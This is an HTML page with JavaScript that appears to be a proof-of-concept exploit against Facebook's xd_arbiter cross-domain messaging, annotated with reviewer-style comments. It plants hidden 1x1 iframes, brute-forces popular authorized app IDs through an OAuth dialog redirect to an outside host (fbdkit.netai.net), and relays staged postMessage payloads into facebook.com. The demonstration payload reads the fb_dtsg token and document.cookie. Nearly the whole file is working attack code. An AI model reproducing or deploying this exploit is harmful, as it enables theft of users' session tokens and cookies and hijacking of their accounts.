<html>
<head></head>
<body onload="go()">
<div id="log_div"></div>
<script>
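/**
 * Append one line to the on-page log (#log_div).
 *
 * The text is inserted as a text node instead of via innerHTML: this page's
 * 'message' listeners forward event.data here, so a string from another
 * window must not be able to inject markup into the logging page.
 *
 * @param {*} message - value to log; coerced with String(), so null/undefined
 *   are logged as text instead of throwing on .toString().
 */
function my_log(message) {
var log = document.getElementById('log_div');
log.appendChild(document.createTextNode(String(message)));
log.appendChild(document.createElement('br'));
}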
// wiretap: log every 'message' event this window receives.
// NOTE(review): the handler reads e.data without checking e.origin or e.source,
// so a string from any window holding a reference to this one ends up in the log.
// The detached-method call (window.addEventListener || window.attachEvent)(...)
// relies on sloppy-mode `this` resolving to window — this script has no 'use strict'.
(window.addEventListener || window.attachEvent)('message', function(e) { console.log('wiretap: ' + e.data); my_log("wiretap: " + e.data); }, false);
// Create a 1x1 iframe whose name and id are _name, attach it to the document,
// then navigate it to _url.
// _name is interpolated into markup on the IE branch and is not escaped here;
// every caller in this file passes a fixed string (plus a numeric id).
function load_frame(_name, _url)
{
// Legacy IE (6-8) accepts an HTML string in createElement — presumably so the
// name attribute is honoured at creation time; not verified here.
var x =
(/MSIE (6|7|8)/).test(navigator.userAgent) ?
document.createElement('<iframe name="' + _name + '">')
:
document.createElement('iframe');
//x.style.display = "none";
// Unitless values: browsers may ignore these as CSS lengths, leaving the default size.
x.style.width = 1;
x.style.height = 1;
//x.src = 'javascript:false';
x.name = _name;
x.id = _name;
// The frame is inserted before src is assigned; the commented-out alternatives
// below suggest this ordering was chosen for Firefox compatibility.
document.body.appendChild(x);
x.src = _url;
// for firefox
// x.src = _url;
//frames[_name].location = _url;
}
// Load a second xd_arbiter frame (channel "my_channel", transport=flash).
// The URL is fixed; only the frame name and channel differ from setup_proxy.
function setup_proxy2()
{
var frame_name = "fb_xdm_frame_http2";
var arbiter_url = "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel&origin=http%3A%2F%2Ffacebook.com&transport=flash";
my_log("setup_proxy2 start");
load_frame(frame_name, arbiter_url);
my_log("setup_proxy2 finished");
}
// Load the xd_arbiter frame used as the proxy (channel "my_channel_http", transport=flash).
// The URL is fixed; only the frame name and channel differ from setup_proxy2.
function setup_proxy()
{
var frame_name = "fb_xdm_frame_http";
var arbiter_url = "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel_http&origin=http%3A%2F%2Ffacebook.com&transport=flash";
my_log("setup_proxy start");
load_frame(frame_name, arbiter_url);
my_log("setup_proxy finished");
}
// Stage 0: load one xd_arbiter frame per app id whose URL fragment carries an
// FB_RPC request built by string concatenation, then re-schedule itself every
// 3 s until reverse_shell_bound (set by the 'message' listener below) is true.
// authorized_app_id is inserted into the JSON-in-URL text without escaping;
// the only caller, go(), passes numeric literals. There is no retry limit.
function deliver_stage0_payload_through(authorized_app_id)
{
my_log("deliver_stage0_payload_through start (authorized_app_id = " + authorized_app_id + ")");
if(!reverse_shell_bound)
{
var jssdk_app_id = 114545895322903; // hard-coded; same value as the "js sdk" entry in go()
var reverse_shell_payload_endpoint =
// stage 0 -> jmp color map
"http://www.facebook.com/safe_image.php?d=AQCpZd43YhJr_orL&url=http%3A%2F%2Ffbdkit.netai.net%2Fpagetab%2Fline_256_half_29.gif"
// (no semicolon above — ASI terminates the assignment at the line break)
// The endpoint is the only URL-encoded part of the fragment; the frame name is
// "fb_xdm_frame_http" followed by the app id.
load_frame("fb_xdm_frame_http" + authorized_app_id.toString(), "http://facebook.com/connect/xd_arbiter.php?version=11#FB_RPC:{\"method\":\"showDialog\", \"params\":[{\"=&relation=parent&\":0, \"&origin=http%3A%2F%2Ffacebook.com&\":0,\"method\":\"permissions.request\",\"abc\":\"qwa\",\"display\":\"page\", \"app_id\":\"" + authorized_app_id + "\", \"response_type\":\"token,signed_request,code\", \"redirect_uri\":\"http://facebook.com/dialog/oauth?client_id=" + jssdk_app_id + "&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.facebook.com&redirect_uri=" + encodeURIComponent(reverse_shell_payload_endpoint) + "&sdk=joey\"}]}");
// Each retry appends another frame with the same name/id; nothing removes earlier ones.
setTimeout(function() { deliver_stage0_payload_through(authorized_app_id); }, 3000);
}
my_log("deliver_stage0_payload_through finished");
}
// Flag polled by the stage-0 and stage-2 loops; set only by the listener below.
var reverse_shell_bound = false;
var reverse_shell_bound_keyphrase = "FB_RPC:reverse_shell_bound";
// Second 'message' listener. The flag is reassigned on every message, so it is true
// only while the most recently received message equals the keyphrase; any other
// message (including the wiretap traffic logged above) sets it back to false.
// As with the wiretap listener, event.origin is not checked; the comparison is loose ==.
(window.addEventListener || window.attachEvent)('message',
function(event){
reverse_shell_bound = event.data == reverse_shell_bound_keyphrase;
}, false);
// Stage 2: once reverse_shell_bound is true, post stage2_payload to the parent
// window with targetOrigin "http://www.facebook.com" (postMessage drops the message
// unless the parent's origin matches). Until then, post a probe string asking each
// of the parent's frames to echo the keyphrase back, and retry every 300 ms with no limit.
// If this page is loaded top-level, `parent` is this window itself, so the message is
// dispatched back to this window and dropped unless its own origin matches the target.
// @param {string} stage2_payload - JavaScript source passed as a plain string;
//   presumably the receiving side evaluates it — that side is not in this file.
function deliver_stage2_payload(stage2_payload)
{
// Connection acknowledgement received, delivering stage2 payload
if(reverse_shell_bound)
{
parent.postMessage(stage2_payload, "http://www.facebook.com");
}
else
{
// Probe source built by concatenation; the keyphrase is echoed to origin http://fbdkit.netai.net.
var report_keyphrase_payload =
"for(var fr = 0; fr < window.frames.length; fr++)" +
"{ window.frames[fr].postMessage(\"" + reverse_shell_bound_keyphrase + "\", \"http://fbdkit.netai.net\") }";
parent.postMessage(report_keyphrase_payload, "http://www.facebook.com");
// Missing semicolons here are closed by ASI at the line breaks.
setTimeout(function() { deliver_stage2_payload(stage2_payload) }, 300)
}
}
// Entry point (body onload): schedule the two arbiter frames after `lag` ms, then one
// stage-0 attempt per app id staggered 50 ms apart from 500 + lag ms, then start the
// stage-2 delivery loop immediately.
function go()
{
var lag = 100;
setTimeout(setup_proxy2, lag); // sender-xd_arbiter
setTimeout(setup_proxy, lag); // proxy-xd_arbiter
// App ids tried in order; the trailing comments are the author's labels.
var authorized_app_ids_to_check =
[
111239619098, // bing
139475280761, // pandora
162729813767876, // tripadvisor
97534753161, // yelp
326803741017, // rottentomatoes
175789541954, // clicker
136494494209, // scribd
119178388096593, // docs
176611639027113, // zynga
111071104403, // kixeye
221300197978270, // ea
// additional
120131118061981, // freelancer.com
113869198637480, // developers.facebook.com <- every app developer should have authorized it
114545895322903, // js sdk
178222352279634, // angry birds!
];
for(var id_num = 0; id_num < authorized_app_ids_to_check.length; id_num++)
{
// multiple payload-xd_arbiters to bruteforce authorized apps
// String-form setTimeout is an implicit eval; presumably used to freeze the
// per-iteration id, since `var id_num` is function-scoped. The ids are numeric
// literals, so no external text reaches the evaluated string.
setTimeout("deliver_stage0_payload_through(" + authorized_app_ids_to_check[id_num] + ")", 500 + lag + 50*id_num);
}
// Demonstration payload: alerts Env.fb_dtsg and document.cookie of whichever
// context ends up evaluating the string.
deliver_stage2_payload("alert('hi there! fb_dtsg = ' + Env.fb_dtsg + ', cookies: ' + document.cookie)");
}
</script>
</body>
</html>